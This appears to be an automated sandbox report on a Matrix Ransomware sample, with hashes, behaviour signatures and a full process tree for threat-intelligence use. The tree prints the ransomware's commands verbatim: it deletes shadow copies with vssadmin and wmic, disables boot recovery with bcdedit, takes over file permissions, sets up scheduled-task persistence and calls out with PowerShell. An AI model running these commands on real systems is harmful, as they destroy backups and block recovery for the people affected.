Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    06-03-2022 03:26

General

  • Target

    e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe

  • Size

    3.8MB

  • MD5

    6fa2ff1dad01f838e0bb814affccd0c6

  • SHA1

    8c26dfd9d19c3b45cd057f895f80d43326fc986d

  • SHA256

    e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c

  • SHA512

    de88757ee96943eaec582760b1631befb09ea8b9a5c8c757e24431978e3338ea7dd922e2b3dd1a47e514bb0ea93252171236f817c4d1220794e9472c8c2f24d3

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity

    suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 26 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe
    "C:\Users\Admin\AppData\Local\Temp\e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe"
    1⤵
    • Matrix Ransomware
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe" "C:\Users\Admin\AppData\Local\Temp\NWDoIXfb.exe"
      2⤵
        PID:2120
      • C:\Users\Admin\AppData\Local\Temp\NWDoIXfb.exe
        "C:\Users\Admin\AppData\Local\Temp\NWDoIXfb.exe" -n
        2⤵
        • Executes dropped EXE
        PID:2548
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\sClalzaj.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2440
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2684
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Syit07VC.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4960
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Syit07VC.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:3472
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:404
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:1128
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\WU68f2OM.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1728
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\WU68f2OM.vbs"
              3⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:4244
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\DvcTOjPS.bat" /sc minute /mo 5 /RL HIGHEST /F
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2052
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\DvcTOjPS.bat" /sc minute /mo 5 /RL HIGHEST /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:4340
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:680
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Run /I /tn DSHCA
                  5⤵
                    PID:3976
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c3pj65MW.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1748
              • C:\Windows\SysWOW64\attrib.exe
                attrib -R -A -S "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"
                3⤵
                • Views/modifies file attributes
                PID:1788
              • C:\Windows\SysWOW64\cacls.exe
                cacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C
                3⤵
                  PID:3008
                • C:\Windows\SysWOW64\takeown.exe
                  takeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"
                  3⤵
                  • Modifies file permissions
                  PID:808
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ETYBXuQh.exe -accepteula "classes.jsa" -nobanner
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:960
                  • C:\Users\Admin\AppData\Local\Temp\ETYBXuQh.exe
                    ETYBXuQh.exe -accepteula "classes.jsa" -nobanner
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:400
                    • C:\Users\Admin\AppData\Local\Temp\ETYBXuQh64.exe
                      ETYBXuQh.exe -accepteula "classes.jsa" -nobanner
                      5⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Enumerates connected drives
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: LoadsDriver
                      • Suspicious use of AdjustPrivilegeToken
                      PID:636
            • C:\Windows\SYSTEM32\cmd.exe
              C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\DvcTOjPS.bat"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:4084
              • C:\Windows\system32\vssadmin.exe
                vssadmin Delete Shadows /All /Quiet
                2⤵
                • Interacts with shadow copies
                PID:5080
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic SHADOWCOPY DELETE
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1300
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled No
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:2584
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:4344
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Delete /TN DSHCA /F
                2⤵
                  PID:4340
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3248

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/2684-135-0x00000000030C0000-0x00000000030C1000-memory.dmp

                Filesize

                4KB

              • memory/2684-142-0x0000000008040000-0x00000000086BA000-memory.dmp

                Filesize

                6.5MB

              • memory/2684-143-0x0000000006E50000-0x0000000006E6A000-memory.dmp

                Filesize

                104KB

              • memory/2684-141-0x00000000030C5000-0x00000000030C7000-memory.dmp

                Filesize

                8KB

              • memory/2684-140-0x0000000006980000-0x000000000699E000-memory.dmp

                Filesize

                120KB

              • memory/2684-139-0x0000000006360000-0x00000000063C6000-memory.dmp

                Filesize

                408KB

              • memory/2684-138-0x00000000062F0000-0x0000000006356000-memory.dmp

                Filesize

                408KB

              • memory/2684-137-0x0000000005AE0000-0x0000000005B02000-memory.dmp

                Filesize

                136KB

              • memory/2684-136-0x00000000030C2000-0x00000000030C3000-memory.dmp

                Filesize

                4KB

              • memory/2684-134-0x0000000074140000-0x00000000748F0000-memory.dmp

                Filesize

                7.7MB

              • memory/2684-133-0x0000000005C50000-0x0000000006278000-memory.dmp

                Filesize

                6.2MB

              • memory/2684-132-0x0000000003050000-0x0000000003086000-memory.dmp

                Filesize

                216KB